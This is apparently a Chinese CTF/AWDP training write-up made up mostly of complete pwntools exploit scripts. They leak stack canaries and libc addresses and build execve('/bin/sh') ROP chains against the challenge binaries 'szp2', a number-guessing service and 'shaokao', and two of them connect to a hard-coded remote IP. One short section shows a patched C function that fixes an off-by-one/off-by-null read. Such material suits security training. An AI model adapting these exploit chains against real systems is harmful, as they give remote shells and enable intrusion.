成都/杭州大型线下AWDP培训-20230710

D | 杀猪盘

#-*- coding:utf-8-*-
from pwn import *
#from LibcSearcher import *
# Connection setup and I/O helpers for the szp2 exploit.
# local = 0 -> talk to the remote challenge host; local = 1 -> spawn ./szp2 so
# gdb can be attached through ac().  log_level="debug" echoes every byte that
# goes over the tube, which is what you want while developing the chain.
context(os="linux", arch="amd64", log_level="debug")
local = 0
if local:
    p = process('./szp2')  # ,env={'LD_PRELOAD':'./libc.so.6'}
    # libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
else:
    p = remote('39.106.48.123', 22015)
    # libc = ELF("libc.so.6")
# nc 39.106.48.123 24920

elf = ELF("szp2")
# Offset tables left over from the script template (o_g: one_gadget-style
# candidates by name; magic: malloc/free/realloc/system).  Neither is used by
# the chain at the bottom of this script, which goes through a raw syscall.
o_g = [0x45226, 0x4527a, 0xf0364, 0xf1207]
magic = [0x3c4b10, 0x3c67a8, 0x846c0, 0x45390]  # malloc, free, realloc, system


def l64():
    """Read through the next 0x7f byte and unpack the last 6 bytes as a 64-bit value."""
    return u64(p.recvuntil("\x7f")[-6:].ljust(8, "\x00"))


def l32():
    """Read through the next 0xf7 byte and unpack the last 4 bytes as a 32-bit value."""
    return u32(p.recvuntil("\xf7")[-4:].ljust(4, "\x00"))


def sla(a, b):
    """Wait for prompt `a`, then send `b` plus a newline (both coerced with str())."""
    return p.sendlineafter(str(a), str(b))


def sa(a, b):
    """Wait for prompt `a`, then send `b` without a newline (both coerced with str())."""
    return p.sendafter(str(a), str(b))


def lg(name, data):
    """Log `data` as a hex value under the label `name`."""
    return p.success(name + ": 0x%x" % data)


def se(payload):
    """Send raw bytes."""
    return p.send(payload)


def rl():
    """Receive whatever is currently buffered."""
    return p.recv()


def sl(payload):
    """Send raw bytes followed by a newline."""
    return p.sendline(payload)


def ru(a):
    """Receive up to and including the delimiter `a` (coerced with str())."""
    return p.recvuntil(str(a))


def ac(a=""):
    """Attach gdb with optional command script `a` when running locally; no-op against the remote."""
    if local:
        return gdb.attach(p, a)
    return None
	
# shellcode = asm(shellcraft.sh(),arch='amd64', os='linux')
def role_3():
    """Walk the role-3 dialogue once and return the number the game prints.

    Answers are sent in the fixed order the menu expects (sla() blocks on each
    prompt).  After '-' is entered at the first "¥" prompt the game prints a
    "¥"-prefixed line whose decimal value is parsed and returned; the caller
    subtracts a fixed offset from it to obtain `base`.  The remaining replies
    just steer the menu back to a neutral state.
    """
    opening = [
        (": ", '3'),
        ("(Y/n)", 'Y'),
        ('。', '\n' * 3),
        ("> ", 1),
        (":", 'aaaa'),
        ("¥", '-'),
    ]
    for prompt, reply in opening:
        sla(prompt, reply)

    ru("¥")
    leaked = int(ru('\n'), 10)  # decimal text up to end of line

    sla("¥", '123')
    sl('\n')
    closing = [
        ("> ", '4'),
        ("¥", '123'),
        ('。', '\n' * 3),
    ]
    for prompt, reply in closing:
        sla(prompt, reply)
    return leaked

def role_4(msg1):
    """Walk the role-4 dialogue, submit `msg1` at the final ":" prompt and
    return the 7 bytes echoed right after it as a 64-bit value.

    The game echoes the message back; the function waits for the tail of that
    echo (20 'a's followed by a newline) and reads the 7 bytes that follow.
    Presumably those are the upper 7 bytes of the stack canary whose NUL low
    byte was overwritten by the newline -- hence the right-justify with a
    leading 0x00 before unpacking.  The caller passes 152 'a' bytes.
    """
    steps = [
        ("请选择: ", '4'),
        ("(Y/n)", 'Y'),
        ('。', '\n' * 13),
        ("> ", 2),
        (None, '\n' * 10),
        ("> ", 1),
        (":", 'qwer'),
        ("¥", '1234'),
        ("¥", '123'),
        (None, '\n'),
        ("> ", '4'),
        ("¥", '1'),
        (None, '\n' * 2),
        (":", msg1),
    ]
    # A None prompt means "just send", otherwise wait for the prompt first.
    for prompt, reply in steps:
        if prompt is None:
            sl(reply)
        else:
            sla(prompt, reply)

    ru("aaaaaaaaaaaaaaaaaaaa\n")
    canary = u64(p.recv(7).rjust(8, '\x00'))
    return canary

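# --- main flow for szp2 -----------------------------------------------------
# 1. leak an address through the role-3 dialogue and turn it into the base the
#    gadget offsets below are relative to;
# 2. leak the stack canary through the role-4 dialogue;
# 3. answer the final prompt with canary + an execve("/bin/sh") ROP chain.
# The script relies on Python 2 str semantics elsewhere (role_4's rjust with a
# str fill on received data); keep running it under Python 2.
sla("> ", 2)
base = role_3() - 0xa29a
lg('base', base)
if base & 0xfff:
    # A module base derived from a leaked pointer should be page aligned; if
    # it is not, the parse most likely grabbed the wrong number and the chain
    # below will only crash the target.
    p.warning("base 0x%x is not page aligned - leak may be wrong" % base)
sl('\n\n')

# Gadget / symbol offsets relative to `base`.  `system` is only logged; the
# final chain uses a raw syscall instead of calling it.
system = base + 0x1ea20
binsh = base + 0xc2d1b
pop_rdi = base + 0x0000000000009cc2  # alt candidate: 0x000000000000cf9b
syscall = base + 0x0000000000009673
pop_rax = base + 0x0000000000064d97
pop_rsi = base + 0x0000000000018c9e
pop_rdx = base + 0x0000000000009bcf

# 152 bytes of filler reach the canary slot; sendline's newline presumably
# lands on the canary's NUL low byte so the echo runs through the other 7.
cannry = role_4('a' * 152)
lg("cannry", cannry)
lg('system', system)
lg('binsh', binsh)
lg('base', base)
sl('\n')

# execve("/bin/sh", 0, 0): rax = 0x3b, rdi = &"/bin/sh", rsi = rdx = 0.
# p64(cannry) is written twice: once into the canary slot and once into the
# following qword (presumably saved rbp, any value works) so the gadgets start
# at the return address.
chain = [pop_rax, 0x3b, pop_rdi, binsh, pop_rsi, 0, pop_rdx, 0, syscall]
payload = b'b' * 152 + p64(cannry) * 2
for word in chain:
    payload += p64(word)
print(len(payload))  # 152 + 16 + 9*8 = 240

sla(":", payload)
sla('。', '\n')
p.interactive()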

D | 猜数字

from pwn import *

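# Target selection for the guess-the-number pwn.  host and port are parsed
# from a single "host:port" string and then actually used for the connection,
# so the address is written once and cannot drift from a second hard-coded
# copy (the old code split the string and then ignored the result).
txt = "39.106.48.123:23587"
host, port = txt.split(':')
s = remote(host, int(port))
context(log_level='debug', arch='amd64', os='linux')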


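def get_num(tube=None):
    """Win one round of the remote "guess the number" game by binary search.

    Flow (mirrors the server prompts): drain the pending banner/prompt, send a
    first guess of 384, then loop: read the verdict, halve the step (never
    below 1), move the guess down on "too large" / up on "too small", and
    stop when the server switches to the "leave a message" prompt.

    The step sequence is 128, 64, ..., 1, 1, 1, ... so the search still
    converges when the secret lies outside the initial 256 +/- 128 window --
    it just finishes with single-unit steps.

    Args:
        tube: pwntools-style tube providing recvrepeat/sendline/recvregex.
            Defaults to the module-level connection ``s``.

    Returns:
        The accepted guess as an int (the old version returned None).

    Raises:
        RuntimeError: the reply matched the verdict regex but carried none of
            the recognised phrases.  The old code matched ``b'too large:'``
            (with a colon) but ``b'too small'`` (without), and on a miss
            silently re-sent the same guess forever; both verdicts are now
            matched without the colon and an unknown reply aborts instead.
    """
    t = s if tube is None else tube
    step = 128
    cur = 256 + step

    print(t.recvrepeat(1))  # banner + first prompt; contents are not parsed
    t.sendline(str(cur).encode())

    while True:
        reply = t.recvregex(r'small|large|message')
        step = step // 2 or 1  # halve, but never stall at 0
        print(reply, cur, step)
        if b'too large' in reply:
            cur -= step
        elif b'too small' in reply:
            cur += step
        elif b'leave a' in reply:
            return cur
        else:
            raise RuntimeError('unrecognised verdict from server: %r' % (reply,))
        t.sendline(str(cur).encode())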


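print('----')
get_num()  # round 1: the "leave a message" prompt get_num() stops at takes the overflow

# Stage 1: ret2plt -- puts(puts@got) leaks a libc address, then return to
# main so the game (and the overflow) can be reached a second time.
elf = ELF('./pwn1')
pop_rdi = ROP(elf).find_gadget(['pop rdi', 'ret'])[0]

main = 0x00401265
puts_plt = elf.plt["puts"]
puts_got = elf.got["puts"]

# 0x70 of buffer plus 8 bytes of saved rbp before the return address.
payload = flat(b'a' * (0x70 + 8), pop_rdi, puts_got, puts_plt, main)
s.send(payload)  # no trailing newline: keep the overflow exactly this long
# A userland libc pointer has 6 significant bytes and ends in 0x7f; pad it to
# 8 bytes before unpacking.
puts_addr = unpack(s.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
success('puts_addr: ' + hex(puts_addr))

print(s.recvrepeat(1))
get_num()  # round 2: win again to reach the overflow with libc now known

# Stage 2: compute the libc base from the leak and return into a one-shot
# gadget at offset `ogg` (one_gadget-style, by name).
ogg = 0x10a41c  # 0xf1247 was the other candidate tried
libc = ELF("libc.so.6")  # the libc shipped with the challenge, not the host's
libc.address = puts_addr - libc.sym["puts"]
if libc.address & 0xfff:
    # leak - symbol offset must be a page-aligned load base; anything else
    # means the wrong libc build or a mis-parsed leak, and `pl` would be junk.
    raise ValueError('libc base 0x%x is not page aligned - wrong leak or libc.so.6' % libc.address)
success('libc: ' + hex(libc.address))

pl = libc.address + ogg
success('pl: ' + hex(pl))
payload = flat(b'a' * (0x70 + 8), pl)
s.sendline(payload)

s.interactive()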

vaccine

mini_redis

mvm

nullnull

防御

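/*
 * edit_read - read up to a2 bytes from stdin into a1, one byte at a time,
 * stopping early at a newline, which is replaced by a NUL terminator.
 * (IDA-style pseudo-C of the challenge function, shown here in its patched
 * "defense" form.)
 *
 * Bugs in the shipped binary, both visible in the original listing:
 *   - the loop test was `v2 = a2--; if (v2 < 0) break;`, so v2 takes the
 *     values a2, a2-1, ..., 0 before the break fires: a2 + 1 bytes were
 *     read into an a2-byte buffer (one-byte overflow);
 *   - when that extra byte was '\n', `*a1 = 0` turned the overflow into a
 *     one-byte NUL write just past the buffer (an off-by-null; e.g. into the
 *     next chunk's size field if a1 is a heap buffer).
 * Tightening the test to `v2 <= 0` limits the loop to a2 iterations, so the
 * newline-to-NUL store can only hit the last valid byte; the newline
 * stripping itself is kept.  (An AWDP-style binary patch that only NOPs the
 * `*a1 = 0` store removes the null write but not the one-byte overread.)
 *
 * Returns the result of the last read(): 1 when stopped by a newline or by
 * the length limit, 0 on EOF, 0xFFFFFFFF on a read() error other than
 * EAGAIN (11) / EINTR (4).  v6 is initialised so a non-positive a2 returns 0
 * rather than an indeterminate value.
 */
__int64 __fastcall edit_read(_BYTE *a1, int a2) {
    int v2; // eax
    unsigned int v6 = 0; // [rsp+18h] [rbp-8h]

    while (1) {
        v2 = a2--;
        if (v2 <= 0) // PATCH: was `v2 < 0`, which let one extra byte through
            break;
        v6 = read(0, a1, 1uLL);
        if (!v6)
            break;
        if (v6 == -1) {
            /* The decompiler rendered this as a cast of the errno pointer;
             * the intended comparison is against the errno value. */
            if (*__errno_location() != 11 && *__errno_location() != 4)
                return 0xFFFFFFFFLL;
        } else {
            if (*a1 == 10) {
                *a1 = 0;  // in bounds now that the loop is capped at a2 bytes
                return v6;
            }
            ++a1;
        }
    }
    return v6;
}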

outout

D | 栈溢出 | shaokao

from pwn import *

# Spawn ./shaokao locally and walk its menu up to the input that overflows.
# The '-100000' sent at the third prompt is the value the exploit relies on
# (presumably an unvalidated negative quantity -- confirm against the binary);
# the trailing choices steer to the prompt the ROP payload is written to.
# s.recv() only drains whatever the menu printed so far.
s = process('./shaokao')
context(log_level='debug', arch='amd64', os='linux')

menu_walk = ['1', '1', '-100000', '3', '4', '5']
for answer in menu_walk:
    s.sendline(answer)
s.recv()

# ROPgadget --ropchain  --binary ./shaokao
from struct import pack

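# execve("/bin//sh", argv, envp) chain for the statically linked ./shaokao;
# every address is fixed (no PIE).  Generated by ROPgadget --ropchain and
# reorganised here: the 59 "add rax, 1" gadgets it emitted to build
# rax = 0x3b (SYS_execve) are written as one gadget repeated 59 times.
#
# Layout: 0x20 of buffer + 8 bytes of saved rbp, then
#   1. store "/bin//sh" at .data (0x4e60e0) and a zero qword right after it;
#   2. rdi = &"/bin//sh", rsi = rdx = &zero (argv/envp pointing at a NULL);
#   3. rax = 0x3b, syscall.
POP_RSI = 0x000000000040a67e      # pop rsi ; ret
POP_RAX = 0x0000000000458827      # pop rax ; ret
MOV_RSI_RAX = 0x000000000045af95  # mov qword ptr [rsi], rax ; ret
XOR_RAX = 0x0000000000447339      # xor rax, rax ; ret
POP_RDI = 0x000000000040264f      # pop rdi ; ret
POP_RDX_RBX = 0x00000000004a404b  # pop rdx ; pop rbx ; ret
ADD_RAX_1 = 0x0000000000496710    # add rax, 1 ; ret
SYSCALL = 0x0000000000402404      # syscall
DATA = 0x00000000004e60e0         # writable .data scratch
SYS_EXECVE = 0x3b


def q(value):
    """Pack one chain word as a little-endian 64-bit quantity."""
    return pack('<Q', value)


p = b'a' * (0x20 + 8)
# .data[0..8] = "/bin//sh" -- the string itself is what `pop rax` pops.
p += q(POP_RSI) + q(DATA)
p += q(POP_RAX) + b'/bin//sh'
p += q(MOV_RSI_RAX)
# .data[8..16] = 0
p += q(POP_RSI) + q(DATA + 8)
p += q(XOR_RAX)
p += q(MOV_RSI_RAX)
# rdi = &"/bin//sh", rsi = rdx = &0
p += q(POP_RDI) + q(DATA)
p += q(POP_RSI) + q(DATA + 8)
p += q(POP_RDX_RBX) + q(DATA + 8) + q(0x4141414141414141)  # rbx: padding
# rax = 0x3b, built as xor + 59 increments exactly as ROPgadget emitted it
# (a `pop rax` of 0x3b would also do if the input path tolerates NUL bytes).
p += q(XOR_RAX) + q(ADD_RAX_1) * SYS_EXECVE
p += q(SYSCALL)

s.sendline(p)
s.interactive()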